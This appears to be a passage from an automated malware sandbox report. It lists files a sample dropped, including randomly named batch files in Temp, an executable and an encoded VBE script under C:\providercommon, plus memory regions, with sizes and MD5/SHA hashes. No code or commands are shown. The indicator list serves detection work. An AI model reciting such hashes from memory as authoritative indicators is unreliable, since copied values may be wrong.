                                            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                            SHA512

                                            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            59d97011e091004eaffb9816aa0b9abd

                                            SHA1

                                            1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                            SHA256

                                            18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                            SHA512

                                            d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            cadef9abd087803c630df65264a6c81c

                                            SHA1

                                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                            SHA256

                                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                            SHA512

                                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            6c47b3f4e68eebd47e9332eebfd2dd4e

                                            SHA1

                                            67f0b143336d7db7b281ed3de5e877fa87261834

                                            SHA256

                                            8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

                                            SHA512

                                            0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            3a6bad9528f8e23fb5c77fbd81fa28e8

                                            SHA1

                                            f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                            SHA256

                                            986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                            SHA512

                                            846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                          • C:\Users\Admin\AppData\Local\Temp\4stVUxPy0P.bat

                                            Filesize

                                            222B

                                            MD5

                                            acf8a2085398c784e962bbdb87f45b6f

                                            SHA1

                                            e18b9e1ed91540bddebde682710ab852f16b7caa

                                            SHA256

                                            b44df6470f88368b9920ec254e18b2aace8dd23050d35b2d9c4bf6f9cff3f224

                                            SHA512

                                            a530fd48a8888d5687a211d5b7295b37ef17ddaee1afe797a54303fdb1f325d89646a9617ba5bc20a618f4bb03579697b09f41a0a345e447c5e5c7913d5f99be

                                          • C:\Users\Admin\AppData\Local\Temp\DiMaLaQqUm.bat

                                            Filesize

                                            222B

                                            MD5

                                            8a899b8e7ea13e27b9e12d7b8b443641

                                            SHA1

                                            496afc790cc66dd4b649add46faa59b44cb1f34b

                                            SHA256

                                            f8c0b9a1094bbbf5eb4f98fe4806346965e4d3d063df7774c8322dec85ab97dd

                                            SHA512

                                            8cb15b63d534586b9edb6ad62066dd4af9875fe54a814b0925683e05e71ee706cb59d2e42556aa2618240c7b8b729031b40b142262dac3f75be3706f0c7a1135

                                          • C:\Users\Admin\AppData\Local\Temp\HiXkD60p2N.bat

                                            Filesize

                                            222B

                                            MD5

                                            0964b45e06c408423c0d7a1aea98fab8

                                            SHA1

                                            9fa0ab3868558fe0bd8fdfdb0c7810d36fd5284f

                                            SHA256

                                            f86d864548207f307544e86c334f28a1ffbf6cbaa2c8640c3908885422d86a3d

                                            SHA512

                                            e7d6094cdbdb3f9091902ac8bfe265f214c0c1f53bf25d2f8fc269db066d443a4889f079b51dcaf714ca7466e8994b77ea991a745f39402c20aca7045c986f31

                                          • C:\Users\Admin\AppData\Local\Temp\NczlPfxoCy.bat

                                            Filesize

                                            222B

                                            MD5

                                            aade93cecd3bc059edb794e113a98fed

                                            SHA1

                                            932472f643cdd70c14e6cc09370c03ab4c5205b4

                                            SHA256

                                            586b2e2cf380fa96ac0dedeefe58b67c057b9c1932014d86cc223a1c37cd25ca

                                            SHA512

                                            cdf705b8196730dff0da8499b27261b1b4e529dc095cfaf2770fa473e2063b0026713bbfc8fb36cf132a56ca5fea78368d58d7c18b5ed30fb4e0d8a61a820a18

                                          • C:\Users\Admin\AppData\Local\Temp\SU2rmp5bpW.bat

                                            Filesize

                                            222B

                                            MD5

                                            ce60bf971067cf9fd9b2fa8941fa18d7

                                            SHA1

                                            4c13e2aaf4f4457153f965e1f895ac17d63ea229

                                            SHA256

                                            ea607532ae292d182d9a56a6147e7312311dc47a6faff7177f7e3f52bbe7bf18

                                            SHA512

                                            3ea30d4f2d8bffd60004d71f78a7e69f90f4e062789d49c0aeae1ecb80177cfcf789a7649d012166c2e7af6666a8111a72365aba3b850f448a26adfd68fcf89d

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3x5d1bvl.j5v.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\AppData\Local\Temp\cOf3pucYXi.bat

                                            Filesize

                                            222B

                                            MD5

                                            ab7d8d506bc38c3c01545391a88336a2

                                            SHA1

                                            543472aa6b627ff5a47d88ffdd6739567a368f70

                                            SHA256

                                            62fc60a89a36bc429b525ff3eb165be9ee76224431e327181b6424861cdd472d

                                            SHA512

                                            4c5fe3bd5060006bba08494bd4e47675ec8d59da6d2c4adf28348b458f02ef8b7015bb7a4017c5127b5e6da265271069ea5e4bea4b8c514c1099cd3c2f7ebb19

                                          • C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat

                                            Filesize

                                            222B

                                            MD5

                                            16ba62a269a58bb69b33151b0ce30b18

                                            SHA1

                                            f61f14b66c28cc35036e513a4524738a31c9962f

                                            SHA256

                                            0dfbe229ecd1fba80a5282a5c1997a4ab8e26ea1f75f51c038363577f8e94e4a

                                            SHA512

                                            fa78d878e53a72333be9c88ca0fe05750587498eeac84e4dc2ed0d29424af78aa94825afc87d3200897a8b356e1b7e614142aff69ad41c1148e7bc9d9f28a0bf

                                          • C:\Users\Admin\AppData\Local\Temp\iLsGNVHQP6.bat

                                            Filesize

                                            222B

                                            MD5

                                            ce564adc7b8c86a7dc8ff1074ff55d99

                                            SHA1

                                            96dacb7b7ba21959f72b96a85b6f5b8e1f729a8d

                                            SHA256

                                            56e8939801ba6ae3f6542f5962f3bab8ac4b16ddb1640bbe9cc0a9ba123ebcc3

                                            SHA512

                                            4122cd90e8a5a8435d8cd29654d17a9c3130918e2702a7589ee993c858eb01ebc675a712d96db137458e248f77cfe8b1997e26b52b09153bbec31f715a1d5c45

                                          • C:\Users\Admin\AppData\Local\Temp\iRE9Vp3kbL.bat

                                            Filesize

                                            222B

                                            MD5

                                            f9a4d1386ddc658966490988ff0db9de

                                            SHA1

                                            3b102b21d9712f4b27a8ec6294e302a0257c747e

                                            SHA256

                                            1d6c493f28e1a2d4a1612cbce1c32b07dfa3b1b3084743a82e7da5e0ddb9c123

                                            SHA512

                                            54cd91b91ffc3ab5ea32368f3f500abcb38c2fb091ec973a4706218be3e32875f3e52f4a79a377dd20b52e42807ac7cd4760601ef963ac4cc076a0ee135cab8a

                                          • C:\Users\Admin\AppData\Local\Temp\kNGCBu7dv8.bat

                                            Filesize

                                            222B

                                            MD5

                                            cb218a014f4b0f4170dcc0768e4d4e5e

                                            SHA1

                                            7428f83f9599a4a7eb88f4f47c2fe9390cc83c19

                                            SHA256

                                            cc99253ba57a393f43f38aa7ad04d76cfe192422b47b35bef9e937fa65f523b6

                                            SHA512

                                            e4c4df75e3ca597af1f5b40aecd83e1a271bdaf49c2b1f7fb49f3aae097d72da70e25663ed629e04566dcaa8d9c85c9aa8cf76a4d1f02ddfa92f0e535c8e1f15

                                          • C:\Users\Admin\AppData\Local\Temp\p6CE4ikEee.bat

                                            Filesize

                                            222B

                                            MD5

                                            474b1000b3b9f2b919493547b22d6a8e

                                            SHA1

                                            c021d95f52804ec0a4938634e58f5206c667b9e7

                                            SHA256

                                            1ff6208f3d6741c9a40c3b2c176b61cfdd9e9b3371ebbf2bad849b2d0b4c7435

                                            SHA512

                                            1bab296efb5642c9ddfc215cf2681dd95cb073e6f3170910042a2818aa9293e72f62e9af0fee6d94d024c8cd824b9ab72057ec62dfdcad86a5a0c27a8e3f55fd

                                          • C:\providercommon\1zu9dW.bat

                                            Filesize

                                            36B

                                            MD5

                                            6783c3ee07c7d151ceac57f1f9c8bed7

                                            SHA1

                                            17468f98f95bf504cc1f83c49e49a78526b3ea03

                                            SHA256

                                            8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                            SHA512

                                            c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                          • C:\providercommon\DllCommonsvc.exe

                                            Filesize

                                            1.0MB

                                            MD5

                                            bd31e94b4143c4ce49c17d3af46bcad0

                                            SHA1

                                            f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                            SHA256

                                            b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                            SHA512

                                            f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                          • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                            Filesize

                                            197B

                                            MD5

                                            8088241160261560a02c84025d107592

                                            SHA1

                                            083121f7027557570994c9fc211df61730455bb5

                                            SHA256

                                            2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                            SHA512

                                            20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                          • memory/2576-269-0x0000000000C90000-0x0000000000CA2000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/2608-282-0x00000000011D0000-0x00000000011E2000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/2836-157-0x0000000001470000-0x0000000001482000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/3224-289-0x000000001B950000-0x000000001B962000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/3368-64-0x00000213F7840000-0x00000213F7862000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/3760-17-0x000000001C2E0000-0x000000001C2EC000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/3760-16-0x000000001C2D0000-0x000000001C2DC000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/3760-14-0x000000001BB50000-0x000000001BB62000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/3760-15-0x000000001C2C0000-0x000000001C2CC000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/3760-12-0x00007FFEF6E33000-0x00007FFEF6E35000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/3760-13-0x0000000000E90000-0x0000000000FA0000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/4620-250-0x00000000013F0000-0x0000000001402000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/5076-237-0x000000001B100000-0x000000001B112000-memory.dmp

                                            Filesize

                                            72KB

                                          We care about your privacy.

                                          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.